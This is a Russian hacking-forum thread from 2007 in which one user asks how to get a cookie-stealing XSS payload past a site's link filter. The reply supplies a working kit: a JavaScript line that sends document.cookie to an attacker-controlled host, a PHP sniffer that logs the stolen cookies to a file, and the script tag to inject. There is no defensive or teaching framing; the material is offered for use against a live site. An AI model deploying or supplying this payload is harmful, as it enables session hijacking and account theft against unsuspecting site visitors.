ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Как обойти фильтр при вводе ссылки???
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как обойти фильтр при вводе ссылки???
  #1  
Старый 10.01.2007, 14:18
Аватар для DesignerMix
DesignerMix
Познающий
Регистрация: 10.01.2007
Сообщений: 35
Провел на форуме:
62785

Репутация: 34
Question Как обойти фильтр при вводе ссылки???
Значица есть сайт на котором имеется XSS - дыра, но вот в чём загвоздка. Когда я вставляю код на алерт то окошко вылетает, но как только хочу внести данные о тех кто зайдёт на страничку в лог вот таким образом #<script>location.href="http://ccl.whiteacid.org/log.php?182292"+document.cookie</script># предварительно всё зашифровав фильтр меняет этот код так, чтобы по ссылке автоматически не переходилось #<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>#. Как с этим быть?
 
Ответить с цитированием

  #2  
Старый 10.01.2007, 18:15
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию
Создаем файл cookie.js и пишем в нем:

location.href='http://твой_сайт_с_php/sniffer.php' + document.cookie;

Создаем файл sniffer.php
Код:
<?php
$cookie = $_SERVER['QUERY_STRING'];
if($cookie)
{
$fp = fopen("cookies.txt", "a+");
fwrite($fp, "Original: ".$cookie."rn"."UrlDecoded: ".urldecode($cookie)."rnrn");
fclose($fp);
header("Location: fbi.gov");
}
?>
Это код простейшего сниффера. Их полно в сети.

Создаем файл cookies.txt и ставим права на запись.
(В доведенный до ума снифер обычно включают различные проверки и нет необходимости создавать другие файлы)

В итоге получаем строчку:
Код:
<script src=http://твой_сайт_с_php/cookie.js></script>
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как меня развели но при етом я поемел бобла All-Mal Болталка 7 28.11.2006 22:59
Плакаль!!!! Бродил вчера по врачебным форумам, искал инфу про лопнувшие в глазах .... $G@mer Болталка 6 12.10.2006 17:12
Общие сведения о Ftp уязвимостях. ReVOLVeR Чужие Статьи 0 15.09.2006 19:27
Как подстраховать себя при работе с картами r@xpress Чужие Статьи 4 22.04.2006 05:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ